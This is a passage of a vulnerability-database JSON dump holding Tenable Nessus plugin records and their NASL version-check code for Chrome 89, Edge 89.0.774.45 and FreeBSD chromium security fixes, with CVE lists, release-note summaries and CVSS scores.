value:\"https://crbug.com/1158010\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1146651\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1170584\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1173879\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1174186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1174943\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1175507\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1177875\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1182767\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1049265\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1105875\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1131929\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1100748\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1153445\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1155516\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1161739\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1165392\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1166091\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 89.0.4389.72 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27844\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\ninstalls = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'89.0.4389.72', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2021-03-16T12:01:15", "description": "The version of Microsoft Edge installed on the remote Windows host is prior to 89.0.774.45. It is, therefore, affected\nby multiple vulnerabilities as referenced in the March 4, 2021 advisory.\n\n - A flaw was found in openjpeg's src/lib/openjp2/t2.c in versions prior to 2.4.0. This flaw allows an\n attacker to provide crafted input to openjpeg during conversion and encoding, causing an out-of-bounds\n write. The highest threat from this vulnerability is to confidentiality, integrity, as well as system\n availability. (CVE-2020-27844)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 3, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-03-08T00:00:00", "title": "Microsoft Edge (Chromium) < 89.0.774.45 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-21168", "CVE-2021-21173", "CVE-2021-21185", "CVE-2021-21165", "CVE-2021-21179", "CVE-2021-21171", "CVE-2020-27844", "CVE-2021-21161", "CVE-2021-21178", "CVE-2021-21176", "CVE-2021-21159", "CVE-2021-21187", "CVE-2021-21180", "CVE-2021-21170", "CVE-2021-21162", "CVE-2021-21181", "CVE-2021-21167", "CVE-2021-21172", "CVE-2021-21163", "CVE-2021-21186", "CVE-2021-21166", "CVE-2021-21175", "CVE-2021-21190", "CVE-2021-21160", "CVE-2021-21184", "CVE-2021-21164", "CVE-2021-21188", "CVE-2021-21174", "CVE-2021-21177", "CVE-2021-21189", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21169"], "modified": "2021-03-08T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_89_0_774_45.NASL", "href": "https://www.tenable.com/plugins/nessus/147192", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147192);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/15\");\n\n script_cve_id(\n \"CVE-2020-27844\",\n \"CVE-2021-21159\",\n \"CVE-2021-21160\",\n \"CVE-2021-21161\",\n \"CVE-2021-21162\",\n \"CVE-2021-21163\",\n \"CVE-2021-21164\",\n \"CVE-2021-21165\",\n \"CVE-2021-21166\",\n \"CVE-2021-21167\",\n \"CVE-2021-21168\",\n \"CVE-2021-21169\",\n \"CVE-2021-21170\",\n \"CVE-2021-21171\",\n \"CVE-2021-21172\",\n \"CVE-2021-21173\",\n \"CVE-2021-21174\",\n \"CVE-2021-21175\",\n \"CVE-2021-21176\",\n \"CVE-2021-21177\",\n \"CVE-2021-21178\",\n \"CVE-2021-21179\",\n \"CVE-2021-21180\",\n \"CVE-2021-21181\",\n \"CVE-2021-21182\",\n \"CVE-2021-21183\",\n \"CVE-2021-21184\",\n \"CVE-2021-21185\",\n \"CVE-2021-21186\",\n \"CVE-2021-21187\",\n \"CVE-2021-21188\",\n \"CVE-2021-21189\",\n \"CVE-2021-21190\"\n );\n\n script_name(english:\"Microsoft Edge (Chromium) < 89.0.774.45 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge installed on the remote Windows host is prior to 89.0.774.45. It is, therefore, affected\nby multiple vulnerabilities as referenced in the March 4, 2021 advisory.\n\n - A flaw was found in openjpeg's src/lib/openjp2/t2.c in versions prior to 2.4.0. This flaw allows an\n attacker to provide crafted input to openjpeg during conversion and encoding, causing an out-of-bounds\n write. The highest threat from this vulnerability is to confidentiality, integrity, as well as system\n availability. (CVE-2020-27844)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://docs.microsoft.com/en-us/DeployEdge/microsoft-edge-relnotes-security#march-4-2021\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b2e30009\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-27844\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21161\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21162\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21163\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21164\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21165\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21166\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21167\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21168\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21170\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21171\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21172\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21173\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21174\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21175\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21176\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21177\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21178\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21179\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21180\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21181\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21182\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21183\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21184\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21185\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21187\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21188\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21189\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-21190\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge version 89.0.774.45 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27844\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\nget_kb_item_or_exit('SMB/Registry/Enumerated');\napp_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\nconstraints = [\n { 'fixed_version' : '89.0.774.45' }\n];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2021-03-17T03:00:29", "description": "Chrome Releases reports :\n\nThis release includes 47 security fixes, including the below. Google\nis aware of reports that an exploit for CVE-2021-21166 exists in the\nwild.\n\n- [1171049] High CVE-2021-21159: Heap buffer overflow in TabStrip.\nReported by Khalil Zhani on 2021-01-27\n\n- [1170531] High CVE-2021-21160: Heap buffer overflow in WebAudio.\nReported by Marcin 'Icewall' Noga of Cisco Talos on 2021-01-25\n\n- [1173702] High CVE-2021-21161: Heap buffer overflow in TabStrip.\nReported by Khalil Zhani on 2021-02-02\n\n- [1172054] High CVE-2021-21162: Use after free in WebRTC. Reported by\nAnonymous on 2021-01-29\n\n- [1111239] High CVE-2021-21163: Insufficient data validation in\nReader Mode. Reported by Alison Huffman, Microsoft Browser\nVulnerability Research on 2020-07-30\n\n- [1164846] High CVE-2021-21164: Insufficient data validation in\nChrome for iOS. Reported by Muneaki Nishimura (nishimunea) on\n2021-01-11\n\n- [1174582] High CVE-2021-21165: Object life cycle issue in audio.\nReported by Alison Huffman, Microsoft Browser Vulnerability Research\non 2021-02-04\n\n- [1177465] High CVE-2021-21166: Object lifecycle issue in audio.\nReported by Alison Huffman, Microsoft Browser Vulnerability Research\non 2021-02-11\n\n- [1161144] Medium CVE-2021-21167: Use after free in bookmarks.\nReported by Leecraso and Guang Gong of 360 Alpha Lab on 2020-12-22\n\n- [1152226] Medium CVE-2021-21168: Insufficient policy enforcement in\nappcache. Reported by Luan Herrera (@lbherrera_) on 2020-11-24\n\n- [1166138] Medium CVE-2021-21169: Out of bounds memory access in V8.\nReported by Bohan Liu (@P4nda20371774) and Moon Liang of Tencent\nSecurity Xuanwu Lab on 2021-01-13\n\n- [1111646] Medium CVE-2021-21170: Incorrect security UI in Loader.\nReported by David Erceg on 2020-07-31\n\n- [1152894] Medium CVE-2021-21171: Incorrect security UI in TabStrip\nand Navigation. Reported by Irvan Kurniawan (sourc7) on 2020-11-25\n\n- [1150810] Medium CVE-2021-21172: Insufficient policy enforcement in\nFile System API. Reported by Maciej Pulikowski on 2020-11-19\n\n- [1154250] Medium CVE-2021-21173: Side-channel information leakage in\nNetwork Internals. Reported by Tom Van Goethem from imec-DistriNet, KU\nLeuven on 2020-12-01\n\n- [1158010] Medium CVE-2021-21174: Inappropriate implementation in\nReferrer. Reported by Ashish Gautam Kamble on 2020-12-11\n\n- [1146651] Medium CVE-2021-21175: Inappropriate implementation in\nSite isolation. Reported by Jun Kokatsu, Microsoft Browser\nVulnerability Research on 2020-11-07\n\n- [1170584] Medium CVE-2021-21176: Inappropriate implementation in\nfull screen mode. Reported by Luan Herrera (@lbherrera_) on 2021-01-26\n\n- [1173879] Medium CVE-2021-21177: Insufficient policy enforcement in\nAutofill. Reported by Abdulrahman Alqabandi, Microsoft Browser\nVulnerability Research on 2021-02-03\n\n- [1174186] Medium CVE-2021-21178: Inappropriate implementation in\nCompositing. Reported by Japong on 2021-02-03\n\n- [1174943] Medium CVE-2021-21179: Use after free in Network\nInternals. Reported by Anonymous on 2021-02-05\n\n- [1175507] Medium CVE-2021-21180: Use after free in tab search.\nReported by Abdulrahman Alqabandi, Microsoft Browser Vulnerability\nResearch on 2021-02-07\n\n- [1177875] Medium CVE-2020-27844: Heap buffer overflow in OpenJPEG.\nReported by Sean Campbell at Tableau on 2021-02-12\n\n- [1182767] Medium CVE-2021-21181: Side-channel information leakage in\nautofill. Reported by Xu Lin (University of Illinois at Chicago),\nPanagiotis Ilia (University of Illinois at Chicago), Jason Polakis\n(University of Illinois at Chicago) on 2021-02-26\n\n- [1049265] Low CVE-2021-21182: Insufficient policy enforcement in\nnavigations. Reported by Luan Herrera (@lbherrera_) on 2020-02-05\n\n- [1105875] Low CVE-2021-21183: Inappropriate implementation in\nperformance APIs. Reported by Takashi Yoneuchi (@y0n3uchy) on\n2020-07-15\n\n- [1131929] Low CVE-2021-21184: Inappropriate implementation in\nperformance APIs. Reported by James Hartig on 2020-09-24\n\n- [1100748] Low CVE-2021-21185: Insufficient policy enforcement in\nextensions. Reported by David Erceg on 2020-06-30\n\n- [1153445] Low CVE-2021-21186: Insufficient policy enforcement in QR\nscanning. Reported by dhirajkumarnifty on 2020-11-28\n\n- [1155516] Low CVE-2021-21187: Insufficient data validation in URL\nformatting. Reported by Kirtikumar Anandrao Ramchandani on 2020-12-04\n\n- [1161739] Low CVE-2021-21188: Use after free in Blink. Reported by\nWoojin Oh(@pwn_exploit) of STEALIEN on 2020-12-24\n\n- [1165392] Low CVE-2021-21189: Insufficient policy enforcement in\npayments. Reported by Khalil Zhani on 2021-01-11\n\n- [1166091] Low CVE-2021-21190: Uninitialized Use in PDFium. Reported\nby Zhou Aiting(@zhouat1) of Qihoo 360 Vulcan Team on 2021-01-13", "edition": 3, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-03-05T00:00:00", "title": "FreeBSD : chromium -- multiple vulnerabilities (f00b65d8-7ccb-11eb-b3be-e09467587c17)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-21168", "CVE-2021-21173", "CVE-2021-21185", "CVE-2021-21165", "CVE-2021-21179", "CVE-2021-21171", "CVE-2020-27844", "CVE-2021-21161", "CVE-2021-21178", "CVE-2021-21176", "CVE-2021-21159", "CVE-2021-21187", "CVE-2021-21180", "CVE-2021-21170", "CVE-2021-21162", "CVE-2021-21181", "CVE-2021-21167", "CVE-2021-21172", "CVE-2021-21163", "CVE-2021-21186", "CVE-2021-21166", "CVE-2021-21175", "CVE-2021-21190", "CVE-2021-21160", "CVE-2021-21184", "CVE-2021-21164", "CVE-2021-21188", "CVE-2021-21174", "CVE-2021-21177", "CVE-2021-21189", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21169"], "modified": "2021-03-05T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:chromium"], "id": "FREEBSD_PKG_F00B65D87CCB11EBB3BEE09467587C17.NASL", "href": "https://www.tenable.com/plugins/nessus/147152", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(147152);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/16\");\n\n script_cve_id(\"CVE-2020-27844\", \"CVE-2021-21159\", \"CVE-2021-21160\", \"CVE-2021-21161\", \"CVE-2021-21162\", \"CVE-2021-21163\", \"CVE-2021-21164\", \"CVE-2021-21165\", \"CVE-2021-21166\", \"CVE-2021-21167\", \"CVE-2021-21168\", \"CVE-2021-21169\", \"CVE-2021-21170\", \"CVE-2021-21171\", \"CVE-2021-21172\", \"CVE-2021-21173\", \"CVE-2021-21174\", \"CVE-2021-21175\", \"CVE-2021-21176\", \"CVE-2021-21177\", \"CVE-2021-21178\", \"CVE-2021-21179\", \"CVE-2021-21180\", \"CVE-2021-21181\", \"CVE-2021-21182\", \"CVE-2021-21183\", \"CVE-2021-21184\", \"CVE-2021-21185\", \"CVE-2021-21186\", \"CVE-2021-21187\", \"CVE-2021-21188\", \"CVE-2021-21189\", \"CVE-2021-21190\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (f00b65d8-7ccb-11eb-b3be-e09467587c17)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Chrome Releases reports :\n\nThis release includes 47 security fixes, including the below. Google\nis aware of reports that an exploit for CVE-2021-21166 exists in the\nwild.\n\n- [1171049] High CVE-2021-21159: Heap buffer overflow in TabStrip.\nReported by Khalil Zhani on 2021-01-27\n\n- [1170531] High CVE-2021-21160: Heap buffer overflow in WebAudio.\nReported by Marcin 'Icewall' Noga of Cisco Talos on 2021-01-25\n\n- [1173702] High CVE-2021-21161: Heap buffer overflow in TabStrip.\nReported by Khalil Zhani on 2021-02-02\n\n- [1172054] High CVE-2021-21162: Use after free in WebRTC. Reported by\nAnonymous on 2021-01-29\n\n- [1111239] High CVE-2021-21163: Insufficient data validation in\nReader Mode. Reported by Alison Huffman, Microsoft Browser\nVulnerability Research on 2020-07-30\n\n- [1164846] High CVE-2021-21164: Insufficient data validation in\nChrome for iOS. Reported by Muneaki Nishimura (nishimunea) on\n2021-01-11\n\n- [1174582] High CVE-2021-21165: Object life cycle issue in audio.\nReported by Alison Huffman, Microsoft Browser Vulnerability Research\non 2021-02-04\n\n- [1177465] High CVE-2021-21166: Object lifecycle issue in audio.\nReported by Alison Huffman, Microsoft Browser Vulnerability Research\non 2021-02-11\n\n- [1161144] Medium CVE-2021-21167: Use after free in bookmarks.\nReported by Leecraso and Guang Gong of 360 Alpha Lab on 2020-12-22\n\n- [1152226] Medium CVE-2021-21168: Insufficient policy enforcement in\nappcache. Reported by Luan Herrera (@lbherrera_) on 2020-11-24\n\n- [1166138] Medium CVE-2021-21169: Out of bounds memory access in V8.\nReported by Bohan Liu (@P4nda20371774) and Moon Liang of Tencent\nSecurity Xuanwu Lab on 2021-01-13\n\n- [1111646] Medium CVE-2021-21170: Incorrect security UI in Loader.\nReported by David Erceg on 2020-07-31\n\n- [1152894] Medium CVE-2021-21171: Incorrect security UI in TabStrip\nand Navigation. Reported by Irvan Kurniawan (sourc7) on 2020-11-25\n\n- [1150810] Medium CVE-2021-21172: Insufficient policy enforcement in\nFile System API. Reported by Maciej Pulikowski on 2020-11-19\n\n- [1154250] Medium CVE-2021-21173: Side-channel information leakage in\nNetwork Internals. Reported by Tom Van Goethem from imec-DistriNet, KU\nLeuven on 2020-12-01\n\n- [1158010] Medium CVE-2021-21174: Inappropriate implementation in\nReferrer. Reported by Ashish Gautam Kamble on 2020-12-11\n\n- [1146651] Medium CVE-2021-21175: Inappropriate implementation in\nSite isolation. Reported by Jun Kokatsu, Microsoft Browser\nVulnerability Research on 2020-11-07\n\n- [1170584] Medium CVE-2021-21176: Inappropriate implementation in\nfull screen mode. Reported by Luan Herrera (@lbherrera_) on 2021-01-26\n\n- [1173879] Medium CVE-2021-21177: Insufficient policy enforcement in\nAutofill. Reported by Abdulrahman Alqabandi, Microsoft Browser\nVulnerability Research on 2021-02-03\n\n- [1174186] Medium CVE-2021-21178: Inappropriate implementation in\nCompositing. Reported by Japong on 2021-02-03\n\n- [1174943] Medium CVE-2021-21179: Use after free in Network\nInternals. Reported by Anonymous on 2021-02-05\n\n- [1175507] Medium CVE-2021-21180: Use after free in tab search.\nReported by Abdulrahman Alqabandi, Microsoft Browser Vulnerability\nResearch on 2021-02-07\n\n- [1177875] Medium CVE-2020-27844: Heap buffer overflow in OpenJPEG.\nReported by Sean Campbell at Tableau on 2021-02-12\n\n- [1182767] Medium CVE-2021-21181: Side-channel information leakage in\nautofill. Reported by Xu Lin (University of Illinois at Chicago),\nPanagiotis Ilia (University of Illinois at Chicago), Jason Polakis\n(University of Illinois at Chicago) on 2021-02-26\n\n- [1049265] Low CVE-2021-21182: Insufficient policy enforcement in\nnavigations. Reported by Luan Herrera (@lbherrera_) on 2020-02-05\n\n- [1105875] Low CVE-2021-21183: Inappropriate implementation in\nperformance APIs. Reported by Takashi Yoneuchi (@y0n3uchy) on\n2020-07-15\n\n- [1131929] Low CVE-2021-21184: Inappropriate implementation in\nperformance APIs. Reported by James Hartig on 2020-09-24\n\n- [1100748] Low CVE-2021-21185: Insufficient policy enforcement in\nextensions. Reported by David Erceg on 2020-06-30\n\n- [1153445] Low CVE-2021-21186: Insufficient policy enforcement in QR\nscanning. Reported by dhirajkumarnifty on 2020-11-28\n\n- [1155516] Low CVE-2021-21187: Insufficient data validation in URL\nformatting. Reported by Kirtikumar Anandrao Ramchandani on 2020-12-04\n\n- [1161739] Low CVE-2021-21188: Use after free in Blink. Reported by\nWoojin Oh(@pwn_exploit) of STEALIEN on 2020-12-24\n\n- [1165392] Low CVE-2021-21189: Insufficient policy enforcement in\npayments. Reported by Khalil Zhani on 2021-01-11\n\n- [1166091] Low CVE-2021-21190: Uninitialized Use in PDFium. Reported\nby Zhou Aiting(@zhouat1) of Qihoo 360 Vulcan Team on 2021-01-13\"\n );\n # https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fc64b00e\"\n );\n # https://vuxml.freebsd.org/freebsd/f00b65d8-7ccb-11eb-b3be-e09467587c17.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2b92bef2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27844\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<89.0.4389.72\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2021-03-16T11:52:05", "description": "The version of Google Chrome installed on the remote macOS host is prior to 89.0.4389.72. It is, therefore, affected 